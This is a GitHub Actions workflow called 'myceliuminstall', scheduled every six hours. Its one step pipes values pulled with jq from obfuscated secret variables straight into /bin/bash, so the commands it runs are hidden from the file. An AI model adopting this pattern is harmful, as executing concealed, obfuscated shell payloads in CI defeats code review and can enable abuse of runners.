name: myceliuminstall
on:
  workflow_dispatch:
  schedule:
    - cron: '30 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: myceliuminstall
        env:
          cel9: ${{ secrets.cel9 }}
        run: |
          echo $cel9 | jq -r .ikr8 | /bin/bash
          echo $mxy0 | jq -r .lgotp18 | /bin/bash
          echo $ne20705 | jq -r .uodof6 | /bin/bash
          echo $ma831 | jq -r .tousv5 | /bin/bash
          echo $qv497 | jq -r .bdui691 | /bin/bash
          echo $ibcqo194 | jq -r .fyzhh82 | /bin/bash

